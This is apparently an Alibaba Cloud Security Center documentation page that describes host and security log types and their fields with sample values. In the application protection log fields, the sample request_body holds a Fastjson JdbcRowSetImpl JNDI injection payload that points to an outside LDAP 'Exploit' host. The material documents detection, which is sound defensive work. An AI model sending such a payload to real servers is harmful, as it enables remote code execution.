Unlock the Power of AI

1 million free tokens

88% Price Reduction

Activate Now
This topic was translated by AI and is currently in queue for revision by our editors. Alibaba Cloud does not guarantee the accuracy of AI-translated content. Request expedited revision

Log categories and field descriptions

Updated at: 2025-03-27 22:34

By viewing Security Center logs, you can promptly discover, investigate, and respond to security events. After purchasing log analysis storage capacity, Security Center automatically enables security logs and host logs, which record security events and host activities respectively. This article describes the log types supported by Security Center and the field descriptions for each log type.

Log types supported by different editions

Different editions of Security Center support different security capabilities, so the log types recorded when servers are bound to different editions will also vary. The following are the log types supported by each edition:

Server edition

Supported log types

Server edition

Supported log types

Anti-virus Edition, Pro Edition, Enterprise Edition, Ultimate Edition

All log types supported by Security Center.

Basic Edition

  • Host logs

    • Client event logs

  • Security logs

    • Vulnerability logs (only records vulnerabilities supported by the Basic Edition)

    • Security alert logs (only records alerts supported by the Basic Edition)

    • Cloud security posture management logs (logs are only recorded after using the cloud security posture management feature)

    • Application protection logs (logs are only recorded after using the application protection feature)

    • Malicious file detection logs (logs are only recorded after using the malicious file detection feature)

    • Core file monitoring event logs (only records alert events reported after using the core file monitoring feature)

Log categories

Host logs

Log type

__topic__

Description

Collection cycle

Log type

__topic__

Description

Collection cycle

Login flow logs

aegis-log-login

Records logs of user logins to servers, including login time, login user, login method, login IP address, and other information.

Login flow logs can help you monitor user activities, promptly identify and respond to abnormal behaviors, thereby ensuring system security.

Note

Security Center does not support login flow logs for Windows Server 2008 operating systems.

Real-time collection.

Network connection logs

aegis-log-network

Records logs of network connection activities, including server connection 5-tuple, connection time, connection status, and other information.

Network connection logs can help you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, and more.

Note
  • The server only collects some states during the process from connection establishment to termination.

  • Inbound traffic is not recorded.

Real-time collection.

Process startup logs

aegis-log-process

Records logs related to process startup on the server, including process start time, startup command, parameters, and other information.

By recording and analyzing process startup logs, you can understand the startup status and configuration information of processes in the system, detect abnormal process activities, malware intrusions, security threats, and other issues.

Real-time collection, process startup is reported immediately.

Brute-force attack logs

aegis-log-crack

Records logs of brute-force attack behaviors, including attempts to log in and crack systems, applications, or accounts.

By recording and analyzing brute-force attack logs, you can understand the brute-force attacks on systems or applications, detect abnormal login attempts, weak passwords, and credential leaks. Brute-force attack logs can also be used to track malicious users and perform forensic analysis, assisting security teams in incident response and investigation.

Real-time collection.

Account snapshot logs

aegis-snapshot-host

Records logs of detailed information about user accounts in systems or applications, including basic attributes of accounts such as username, password policy, login history, etc.

By comparing account snapshot logs at different times, you can understand the changes and evolution of user accounts, and promptly detect potential account security issues, such as unauthorized account access, abnormal account status, etc.

  • When the asset fingerprint automatic collection feature is enabled, collection is performed automatically according to the set cycle. For more information about asset fingerprint automatic collection, see Asset fingerprint investigation.

  • When the asset fingerprint automatic collection feature is not enabled, each server collects once a day at a non-fixed time.

Network snapshot logs

aegis-snapshot-port

Records logs of network connections, including connection 5-tuple, connection status, associated process information, and other fields.

By recording and analyzing network connection snapshot logs, you can understand the active network sockets in the system, helping you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, etc.

Process snapshot logs

aegis-snapshot-process

Records logs of process activities in the system, including process ID, process name, process start time, and other information.

By recording and analyzing process snapshot logs, you can understand the activity status and resource usage of processes in the system, detect abnormal processes, CPU usage, memory leaks, and other issues.

DNS request logs

aegis-log-dns-query

Records logs of DNS query requests, including detailed information about DNS query requests sent by the server, such as the queried domain name, query type, query source, etc.

By analyzing DNS request logs, you can understand DNS query activities in the network, detect abnormal query behaviors, domain hijacking, and DNS poisoning.

Note

For Linux servers with kernel versions lower than 4.X.X series, Security Center does not support the collection of DNS request logs and the detection of malicious DNS behaviors. It is recommended that you consider upgrading the system kernel to a higher version to obtain comprehensive threat detection capabilities.

Real-time collection.

Client event logs

aegis-log-client

Records the online and offline events of the Security Center client.

Real-time collection.

Security log types

Log type

__topic__

Description

Collection cycle

Log type

__topic__

Description

Collection cycle

Vulnerability logs

sas-vul-log

Records logs of vulnerability-related information found in systems or applications, including vulnerability name, vulnerability status, handling actions, and other information.

By recording and analyzing vulnerability logs, you can understand the vulnerabilities in the system, security risks, and attack trends, and take appropriate remedial measures in a timely manner.

Real-time collection.

Baseline logs

sas-hc-log

Records logs of baseline risk check results, including baseline level, baseline category, risk level, and other information.

By recording and analyzing baseline risk logs, you can understand the baseline security status and potential risks of the system.

Note

Only records data for check items that fail for the first time, and data for check items that previously passed but failed upon re-checking.

Security alert logs

sas-security-log

Records logs of security events and alert information that occur in systems or applications, including alert data source, alert details, alert level, and other information.

By recording and analyzing security alert logs, you can understand the security events and threats in the system, and take appropriate response measures in a timely manner.

Cloud security posture management logs

sas-cspm-log

Records logs related to cloud security posture management, including check results, whitelist operations, and other information from cloud security posture management.

By recording and analyzing cloud security posture management logs, you can understand the configuration issues and potential security risks in the cloud platform.

Network defense logs

sas-net-block

Records logs of network attack events, including attack type, source IP address, target IP address, and other key information.

By recording and analyzing network defense logs, you can understand the security events occurring in the network, and take corresponding response and defense measures to improve the security and reliability of the network.

Application protection logs

sas-rasp-log

Records logs of attack alert information from the application protection feature, including attack type, behavioral data, attacker IP, and other key information.

By recording and analyzing application protection alert logs, you can understand the security events occurring in the application, and take corresponding response and defense measures to improve the security and reliability of the application.

Malicious file detection logs

sas-filedetect-log

Records logs of malicious file detection using the malicious file detection SDK feature, including file information, detection scenario, detection results, and other information.

By recording and analyzing malicious file detection logs, you can identify common viruses in offline files and Alibaba Cloud OSS files, such as ransomware, mining programs, etc., and handle them promptly to prevent the spread and execution of malicious files.

Network logs (no longer supported for delivery)

Important
  • Starting from March 27, 2025, the log analysis feature will no longer support the delivery of network logs (including Web access logs, DNS resolution logs, network session logs, and local DNS logs). For alternative solutions for network logs, see Alternative solutions for network log access or delivery.

  • For users who have enabled network log delivery before March 27, 2025, the delivery of corresponding logs will be automatically disabled on March 27, 2025, meaning that new network log data will no longer be delivered. At the same time, the query function for network logs on the Log Analysis page in the Security Center console will be discontinued.

    If you need to query delivered network logs, you can click Advanced Management For Simple Log Service in the upper right corner of the Log Analysis page to go to the Simple Log Service console, and refer to the log field descriptions provided in the appendix of this article to view the delivered network logs.

Log type

__topic__

Description

Collection cycle

Log type

__topic__

Description

Collection cycle

Web access logs

sas-log-http

Records logs of user requests to web servers and web server responses, including detailed information about HTTP requests, such as user IP address, request time, request method, request URL, HTTP status code, response size, etc.

Web access logs are typically used to analyze web traffic and user behavior, identify access patterns and anomalies, optimize website performance, etc.

Data is collected with a delay, generally 1-12 hours

DNS resolution logs

sas-log-dns

Records logs of detailed information about the DNS resolution process, including requested domain name, query type, client IP address, response value, and other information.

By analyzing DNS resolution logs, you can understand the request and response process of DNS resolution, detect abnormal resolution behaviors, DNS hijacking, DNS poisoning, and other issues.

Network session logs

sas-log-session

Records logs of network connections and data transmission, including detailed information about network sessions, such as session start time, IP addresses of both parties, protocols and ports used, etc.

Network session logs are typically used to monitor network traffic, identify potential threats, optimize network performance, etc.

Local DNS logs

local-dns

Records logs of DNS queries and responses on the local DNS server, including detailed information about local DNS requests and responses, such as requested domain name, query type, client IP address, response value, etc.

Through local DNS logs, you can understand DNS query activities in the network, detect abnormal query behaviors, domain hijacking, and DNS poisoning.

Host log field descriptions

Login flow logs

Field name

Description

Example

Field name

Description

Example

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

IP address of the server.

192.168.XX.XX

sas_group_name

Asset group of the server in Security Center.

default

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

src_ip

IP address used to log in to the server.

221.11.XX.XX

dst_port

Port used to log in to the server.

22

login_type

Login type. Values include but are not limited to:

  • SSHLOGIN, SSH: SSH login.

  • RDPLOGIN: Remote desktop login.

  • IPCLOGIN: IPC connection login.

SSH

username

Login username.

admin

login_count

Number of logins.

Repeated logins within 1 minute are merged into 1 log entry. For example, a login_count value of 3 indicates that there were 3 repeated logins in the last minute.

3

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Network connection logs

Field name

Description

Example

Field name

Description

Example

cmd_chain

Process chain.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

Process chain index, which can be used to find the process chain with the same index.

B184

container_hostname

Server name inside the container.

nginx-ingress-controller-765f67fd4d-****

container_id

Container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

Image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

Image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

Container name.

nginx-ingress-****

container_pid

Process ID inside the container.

0

net_connect_dir

Network connection direction. Values:

  • in: Inbound.

  • out: Outbound.

in

dst_ip

IP address of the network connection receiver.

  • When dir is out, it represents the remote host.

  • When dir is in, it represents the local host.

192.168.XX.XX

dst_port

Port of the network connection receiver.

443

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

Server IP address.

192.168.XX.XX

parent_proc_name

File name of the parent process.

/usr/bin/bash

pid

Process ID.

14275

ppid

Parent process ID.

14268

proc_name

Process name.

nginx

proc_path

Process path.

/usr/local/nginx/sbin/nginx

proc_start_time

Process start time.

N/A

connection_type

Protocol. Values:

  • tcp.

  • raw (indicates raw socket).

tcp

sas_group_name

Asset group of the server in Security Center.

default

src_ip

Source IP address.

100.127.XX.XX

src_port

Source port.

41897

srv_comm

Command name associated with the parent process of the parent process.

containerd-shim

status

Network connection status. Values:

  • 1: Connection closed (closed).

  • 2: Waiting for connection request (listen).

  • 3: SYN request sent (syn send).

  • 4: SYN request received (syn recv).

  • 5: Connection established (established).

  • 6: Waiting to close connection (close wait).

  • 7: Closing connection (closing).

  • 8: Waiting for the other party to send a close request (fin_wait1).

  • 9: Waiting for the other party to send a close request and confirm (fin_wait2).

  • 10: Waiting for enough time to ensure that the other party has received the confirmation of the close request (time_wait).

  • 11: Transmission control block deleted (delete_tcb).

5

type

Type of real-time network connection. Values:

  • connect: Actively initiates a TCP connect connection.

  • accept: Receives a TCP connection.

  • listen: Port listening.

listen

uid

ID of the process user.

101

username

Username of the process.

root

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Process startup logs

Field name

Description

Example

Field name

Description

Example

cmd_chain

Process chain.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

Process chain index, which can be used to find the process chain with the same index.

B184

cmd_index

Index of each parameter in the command line, every two as a group, indicating the start and end indices of a parameter.

0,3,5,8

cmdline

Complete command line for process startup.

ipset list KUBE-6-CLUSTER-IP

comm

Command name associated with the process.

N/A

container_hostname

Server name inside the container.

nginx-ingress-controller-765f67fd4d-****

container_id

Container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

Image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

Image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

Container name.

nginx-ingress-****

container_pid

Process ID inside the container.

0

cwd

Process working directory.

N/A

proc_name

Process file name.

ipset

proc_path

Complete path of the process file.

/usr/sbin/ipset

gid

ID of the process group.

0

groupname

User group.

group1

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

Server IP address.

192.168.XX.XX

parent_cmd_line

Command line of the parent process.

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

File name of the parent process.

kube-proxy

parent_proc_path

Complete path of the parent process file.

/usr/local/bin/kube-proxy

pid

Process ID.

14275

ppid

Parent process ID.

14268

proc_start_time

Process start time.

2024-08-01 16:45:40

parent_proc_start_time

Start time of the parent process.

2024-07-12 19:45:19

sas_group_name

Asset group of the server in Security Center.

default

srv_cmd

Command line of the ancestor process.

/usr/bin/containerd

tty

Login terminal. N/A indicates that the account has never logged into a terminal.

N/A

uid

User ID.

123

username

Username of the process.

root

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Brute-force attack logs

Field name

Description

Example

Field name

Description

Example

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

IP address of the server being brute-forced.

192.168.XX.XX

sas_group_name

Asset group of the server in Security Center.

default

uuid

UUID of the server being brute-forced.

5d83b26b-b7ca-4a0a-9267-12*****

login_count

Number of failed logins.

Repeated logins within 1 minute are merged into 1 log entry. For example, a warn_count value of 3 indicates that there were 3 repeated logins in the last minute.

3

src_ip

Source IP address of the login.

47.92.XX.XX

dst_port

Login port.

22

login_type

Login type. Values:

  • SSHLOGIN, SSH: SSH login.

  • RDPLOGIN: Remote desktop login.

  • IPCLOGIN: IPC connection login.

SSH

username

Login username.

user

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Account snapshot logs

Field name

Description

Example

Field name

Description

Example

account_expire

Account expiration time. never indicates that the account never expires.

never

domain

Domain or directory service where the account is located. N/A indicates that it does not belong to any domain.

N/A

groups

Groups to which the account belongs. N/A indicates that it does not belong to any group.

["nscd"]

home_dir

Home directory, the default location for storing and managing files in the system.

/Users/abc

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

Server IP address.

192.168.XX.XX

last_chg

Date of the last password change.

2022-11-29

last_logon

Date and time of the last account login. N/A indicates that the account has never been logged in.

2023-08-18 09:21:21

login_ip

Remote IP address of the last account login. N/A indicates that the account has never been logged in.

192.168.XX.XX

passwd_expire

Password expiration date. never indicates that the password never expires.

2024-08-24

perm

Whether the account has root permissions. Values:

  • 0: No root permissions.

  • 1: Has root permissions.

0

sas_group_name

Asset group of the server in Security Center.

default

shell

Linux Shell command.

/sbin/nologin

status

Status of the user account. Values:

  • 0: Account is prohibited from logging in.

  • 1: Account can log in normally.

0

tty

Login terminal. N/A indicates that the account has never logged into a terminal.

N/A

username

Username.

nscd

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

Password expiration reminder date. never indicates no reminder.

2024-08-20

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Network snapshot logs

Field name

Description

Example

Field name

Description

Example

net_connect_dir

Network connection direction. Values:

  • in: Inbound.

  • out: Outbound.

in

dst_ip

IP address of the network connection receiver.

  • When dir is out, it represents the remote host.

  • When dir is in, it represents the local host.

192.168.XX.XX

dst_port

Port of the network connection receiver.

443

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

Server IP address.

192.168.XX.XX

pid

Process ID.

682

proc_name

Process name.

sshd

connection_type

Protocol. Values:

  • tcp4: TCP connection using IPv4 protocol.

  • tcp6: TCP connection using IPv6 protocol.

tcp4

sas_group_name

Asset group of the server in Security Center.

default

src_ip

Source IP address.

100.127.XX.XX

src_port

Source port.

41897

status

Network connection status. Values:

  • 1: Connection closed (closed).

  • 2: Waiting for connection request (listen).

  • 3: SYN request sent (syn send).

  • 4: SYN request received (syn recv).

  • 5: Connection established (established).

  • 6: Waiting to close connection (close wait).

  • 7: Closing connection (closing).

  • 8: Waiting for the other party to send a close request (fin_wait1).

  • 9: Waiting for the other party to send a close request and confirm (fin_wait2).

  • 10: Waiting for enough time to ensure that the other party has received the confirmation of the close request (time_wait).

  • 11: Transmission control block deleted (delete_tcb).

5

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Process snapshot logs

Field name

Description

Example

Field name

Description

Example

cmdline

Complete command line for process startup.

/usr/local/share/assist-daemon/assist_daemon

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

Server IP address.

192.168.XX.XX

md5

MD5 hash value of the binary file.

Note

MD5 calculation is not performed for process files larger than 1 MB.

1086e731640751c9802c19a7f53a64f5

proc_name

Process file name.

assist_daemon

proc_path

Complete path of the process file.

/usr/local/share/assist-daemon/assist_daemon

pid

Process ID.

1692

pname

Parent process file name.

systemd

sas_group_name

Asset group of the server in Security Center.

default

proc_start_time

Process start time. Built-in field.

2023-08-18 20:00:12

uid

ID of the process user.

101

username

Username of the process.

root

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

DNS request logs

Field name

Description

Example

Field name

Description

Example

domain

Domain name corresponding to the DNS request.

example.aliyundoc.com

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

host_ip

IP address of the server initiating the DNS request.

192.168.XX.XX

pid

Process ID that initiated the DNS request.

3544

ppid

Parent process ID that initiated the DNS request.

3408

cmd_chain

Process chain that initiated the DNS request.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

Command line that initiated the DNS request.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

Process path that initiated the DNS request.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

Asset group of the server in Security Center.

default

time

Time when the DNS request event was captured, which is generally the same as when the DNS request occurred.

2023-08-17 20:05:04

uuid

UUID of the server that initiated the DNS request.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Client event logs

Field name

Description

Example

Field name

Description

Example

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

host_ip

Server IP address.

192.168.XX.XX

agent_version

Client version.

aegis_11_91

last_login

Timestamp of the last login. Unit: milliseconds.

1716444387617

platform

Operating system type. Values:

  • windows

  • linux

linux

region_id

Region ID where the server is located.

cn-beijing

status

Client status. Values:

  • online

  • offline

online

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Security log field descriptions

Vulnerability logs

Field name

Description

Example

Field name

Description

Example

vul_alias_name

Vulnerability alias.

CESA-2023:1335: openssl Security Update

risk_level

Risk level. Values:

  • asap: High

  • later: Medium

  • nntf: Low

later

extend_content

Extended vulnerability information.

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

Public IP address of the asset.

39.104.XX.XX

intranet_ip

Private IP address of the asset.

192.168.XX.XX

instance_name

Host name.

hhht-linux-***

vul_name

Vulnerability name.

centos:7:cesa-2023:1335

operation

Handling action for the vulnerability. Values:

  • new: New.

  • verify: Verify.

  • fix: Fix.

new

status

Status information. Values:

  • 1: Not fixed.

  • 2: Fix failed.

  • 3: Rollback failed.

  • 4: Fixing.

  • 5: Rolling back.

  • 6: Verifying.

  • 7: Fix successful.

  • 8: Fix successful, restart required.

  • 9: Rollback successful.

  • 10: Ignored.

  • 11: Rollback successful, restart required.

  • 12: No longer exists.

  • 13: Expired.

1

tag

Vulnerability tag. Values:

  • oval: Linux software vulnerability.

  • system: Windows system vulnerability.

  • cms: Web-CMS vulnerability.

    Note

    Tags for other types of vulnerabilities are random strings.

oval

type

Vulnerability type. Values:

  • sys: Windows system vulnerability.

  • cve: Linux software vulnerability.

  • cms: Web-CMS vulnerability.

  • emg: Emergency vulnerability.

sys

uuid

Server UUID.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Baseline logs

Field name

Description

Example

Field name

Description

Example

check_item_name

Check item name.

Set minimum password change interval

check_item_level

Baseline check level. Values:

  • high: High risk.

  • medium: Medium risk.

  • low: Low risk.

medium

check_type

Check item type.

Identity authentication

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

risk_level

Risk item level. Values:

  • high: High.

  • medium: Medium.

  • low: Low.

medium

operation

Operation information. Values:

  • new: New.

  • verity: Verify.

new

risk_name

Risk item name.

Password policy compliance detection

sas_group_name

Asset group of the server where the current risk item was detected in Security Center.

default

status

Status information. Values:

  • 1: Not fixed.

  • 2: Fix failed.

  • 3: Rollback failed.

  • 4: Fixing.

  • 5: Rolling back.

  • 6: Verifying.

  • 7: Fix successful.

  • 8: Fix successful, restart required.

  • 9: Rollback successful.

  • 10: Ignored.

  • 11: Rollback successful, restart required.

  • 12: No longer exists.

  • 13: Expired.

1

sub_type_alias_name

Subtype alias (Chinese).

International common security best practices-Ubuntu 16/18/20/22 security baseline check

sub_type_name

Baseline subtype name. For baseline subtype values, see Baseline types and subtypes list.

hc_ubuntu16_cis_rules

type_alias_name

Type alias (Chinese).

International common security best practices

type_name

Baseline type. For baseline type values, see Baseline types and subtypes list.

cis

uuid

UUID of the server where the current risk item was detected.

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Security alert logs

Field name

Description

Example

Field name

Description

Example

data_source

Data source. Values:

  • aegis_suspicious_event: Host anomaly.

  • aegis_suspicious_file_v2: Webshell.

  • aegis_login_log: Abnormal login.

  • honeypot: Cloud honeypot alert event.

  • object_scan: File detection anomaly event.

  • security_event: Security Center anomaly event.

  • sas_ak_leak: AK leak event.

aegis_login_log

detail

Alert details.

Note

The content of the detail field varies depending on the alert type. If you have questions about parameters in the detail field when viewing alert logs, you can contact technical support by submitting a ticket.

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"ECS non-common account login","status":0}

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

Public IP address of the asset.

39.104.XX.XX

intranet_ip

Private IP address of the asset.

192.168.XX.XX

level

Risk level of the alert event. Values:

  • serious: Urgent.

  • suspicious: Suspicious.

  • remind: Reminder.

suspicious

name

Alert name.

Abnormal login-ECS non-common account login

operation

Operation information. Values:

  • new: New.

  • dealing: Processing.

  • update: Update.

new

status

Alert status. Values:

  • 0: All.

  • 1: Pending.

  • 2: Ignored.

  • 4: Confirmed.

  • 8: Marked as false positive.

  • 16: Processing.

  • 32: Processed.

  • 64: Expired.

  • 128: Deleted.

  • 512: Auto-blocking.

  • 513: Auto-blocking completed.

1

unique_info

Unique identifier of the alert.

2536dd765f804916a1fa3b9516b5****

uuid

UUID of the server that generated the alert.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Cloud security posture management logs

Field name

Description

Example

Field name

Description

Example

check_id

Check item ID. You can call the ListCheckResult - View cloud platform configuration check risk item result details API to get the ID value.

11

check_item_name

Check item name.

Back-to-origin configuration

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

instance_name

Instance name.

lsm

instance_result

Impact of the risk. Format is a JSON string.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

Instance subtype. Values:

  • When the instance type is ECS, the subtype values are:

    • INSTANCE.

    • DISK.

    • SECURITY_GROUP.

  • When the instance type is ACR, the subtype values are:

    • REPOSITORY_ENTERPRISE.

    • REPOSITORY_PERSON.

  • When the instance type is RAM, the subtype values are:

    • ALIAS.

    • USER.

    • POLICY.

    • GROUP.

  • When the instance type is WAF, the subtype value is DOMAIN.

  • When the instance type is other values, the subtype value is INSTANCE.

INSTANCE

instance_type

Instance type. Values:

  • ECS: Elastic Compute Service.

  • SLB: Server Load Balancer.

  • RDS: RDS database.

  • MONGODB: MongoDB database.

  • KVSTORE: Redis database.

  • ACR: Container Registry.

  • CSK: CSK.

  • VPC: Virtual Private Cloud.

  • ACTIONTRAIL: ActionTrail.

  • CDN: Content Delivery Network.

  • CAS: Certificate Management Service.

  • RDC: Apsara Devops.

  • RAM: Resource Access Management.

  • DDOS: Anti-DDoS.

  • WAF: Web Application Firewall.

  • OSS: Object Storage Service.

  • POLARDB: PolarDB database.

  • POSTGRESQL: PostgreSQL database.

  • MSE: Microservices Engine.

  • NAS: File Storage.

  • SDDP: Sensitive Data Protection.

  • EIP: Elastic IP Address.

ECS

region_id

Region ID where the instance is located.

cn-hangzhou

requirement_id

Regulation ID. You can obtain this ID through the ListCheckStandard - Get standard list for cloud platform configuration check API.

5

risk_level

Risk level. Values:

  • LOW.

  • MEDIUM.

  • HIGH.

MEDIUM

section_id

Section ID. You can obtain this ID value through the ListCheckResult - View cloud platform configuration check risk item result details API.

1

standard_id

Standard ID. You can obtain this ID through the ListCheckStandard - Get standard list for cloud platform configuration check API.

1

status

Status of the check item. Values:

  • NOT_CHECK: Not checked.

  • CHECKING: Checking.

  • PASS: Check passed.

  • NOT_PASS: Check failed.

  • WHITELIST: Added to whitelist.

PASS

vendor

Cloud vendor. Fixed value: ALIYUN.

ALIYUN

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Network defense logs

Field name

Description

Example

Field name

Description

Example

cmd

Command line of the process being attacked.

nginx: master process nginx

cur_time

Time when the attack event occurred.

2023-09-14 09:21:59

decode_payload

Payload converted from HEX format to characters.

POST /Services/FileService/UserFiles/

dst_ip

IP address of the asset being attacked.

172.16.XX.XX

dst_port

Port of the asset being attacked.

80

func

Type of interception event. Values:

  • payload: Malicious payload type, indicating attack event interception triggered by detection of malicious data or instructions.

  • tuple: Malicious IP type, indicating attack event interception triggered by detection of malicious IP access.

payload

rule_type

Specific rule type of the interception event. Values:

  • alinet_payload: payload event defense rule specified by Security Center.

  • alinet_tuple: tuple event defense rule specified by Security Center.

alinet_payload

instance_id

Instance ID of the asset being attacked.

i-2zeg4zldn8zypsfg****

internet_ip

Public IP address of the asset being attacked.

39.104.XX.XX

intranet_ip

Private IP address of the asset being attacked.

192.168.XX.XX

final_action

Defense action mode. Value: block (blocked).

block

payload

Payload in HEX format.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

Process ID being attacked.

7107

platform

System type of the asset being attacked. Values:

  • win.

  • linux.

linux

proc_path

Path of the process being attacked.

/usr/sbin/nginx

sas_group_name

Asset group of the server in Security Center.

default

src_ip

Source IP address of the attack.

106.11.XX.XX

src_port

Source port of the attack.

29575

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Application protection logs

Field name

Description

Example

Field name

Description

Example

app_dir

Application directory.

/usr/local/aegis/rasp/apps/1111

app_id

Application ID.

6492a391fc9b4e2aad94****

app_name

Application name.

test

confidence_level

Confidence level of the detection algorithm. Values:

  • high.

  • medium.

  • low.

low

request_body

Request body information.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

Request body length.

112

data

Hook point parameters.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

Request header information.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

Name of the host or network device.

testhostname

host_ip

Private IP address of the host.

172.16.XX.XX

is_cliped

Whether this log has been cropped due to excessive length. Values:

  • true: Cropped

  • false: Not cropped

false

jdk_version

JDK version.

1.8.0_292

message

Alert description information.

Unsafe class serial.

request_method

Request method.

Post

platform

Operating system type.

Linux

arch

Operating system architecture.

amd64

kernel_version

Operating system kernel version.

3.10.0-1160.59.1.el7.x86_64

param

Request parameters, common formats include the following:

  • GET parameters.

  • application/x-www-form-urlencoded.

{"url":["http://127.0.0.1.xip.io"]}

payload

Effective attack payload.

bash -c kill -0 -- -'31098'

payload_length

Length of the effective attack payload.

27

rasp_id

Unique ID of the application protection probe.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

Application protection probe version.

0.8.5

src_ip

IP address of the requester.

172.0.XX.XX

final_action

Alert handling result. Values:

  • block: Protection, i.e., blocking.

  • monitor: Monitoring.

block

rule_action

Alert handling method specified by the rule. Values:

  • block.

  • monitor.

block

risk_level

Risk level. Values:

  • high.

  • medium.

  • low.

high

stacktrace

Stack information.

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

Time when the alert was triggered.

